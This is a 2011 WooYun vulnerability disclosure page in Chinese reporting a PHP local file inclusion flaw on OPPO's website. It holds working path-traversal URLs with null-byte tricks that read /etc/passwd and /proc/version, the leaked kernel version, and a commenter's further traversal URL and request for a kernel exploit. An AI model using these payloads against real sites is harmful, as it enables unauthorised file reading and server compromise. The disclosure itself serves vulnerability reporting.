当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-01466

漏洞标题:OPPO官网PHP文件包含漏洞

相关厂商:OPPO

漏洞作者: linxinsnow[N.N.U

提交时间:2011-03-02 13:11

修复时间:2011-04-01 15:00

公开时间:2011-04-01 15:00

漏洞类型:文件包含

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2011-03-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-04-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

OPPO官网的PHP站点,存在大量的PHP文件包含漏洞,可以利用拿到root

详细说明:

漏洞证明:

http://www.oppo.com/index.php?q=mobile/product/newtpl&name=../../../../../../../../etc/passwd%00&tpl=index
读取passwd文件
http://www.oppo.com/index.php?q=mobile/product/newtpl&name=../../../../../../../../proc/version%00&tpl=index
读取系统信息:
Linux version 2.6.18-194.26.1.el5 (mockbuild@builder10.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Tue Nov 9 12:54:20 EST 2010

修复方案:

过滤name字段和tpl字段等用户提交数据!!

版权声明:转载请注明来源 linxinsnow[N.N.U@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

评论

  1. 2011-03-05 16:21 | B0mbErM@n ( 普通白帽子 | Rank:148 漏洞数:49 | My name is @Siro)

    0-0 还没被认领就拿到20Rank 羡慕啊

  2. 2011-03-20 21:29 | yby123 ( 路人 | Rank:21 漏洞数:5 )

    http://www.oppo.com/index.php?q=mobile/product/newtpl&name=a209&tpl=../u521/index

  3. 2011-04-01 15:08 | pg5yl8 ( 实习白帽子 | Rank:91 漏洞数:12 | 我神马都不会 但我常常被人日 这是为神马呢)

    有人干掉没有

  4. 2011-04-01 21:33 | 路人乙 ( 普通白帽子 | Rank:147 漏洞数:29 | 中国移动不厚道,说给礼品也不给!)

    LZ的30rank是咋来的呢?

  5. 2011-04-02 09:50 | Mr.杨总 ( 路人 | Rank:14 漏洞数:4 | 绿色 无毒 你懂得。。。。心要宽 。。。)

    应该是本地包含 如果能远程包含直接拿了 呵呵 鸡肋?

  6. 2013-04-28 13:18 | 無情 ( 实习白帽子 | Rank:41 漏洞数:5 | 根据相关法律法规和政策,此信息未予显示。)

    2.6.18-194.26.1.el5 CentOS release 5.6 (Final)怎么没有expliot求exp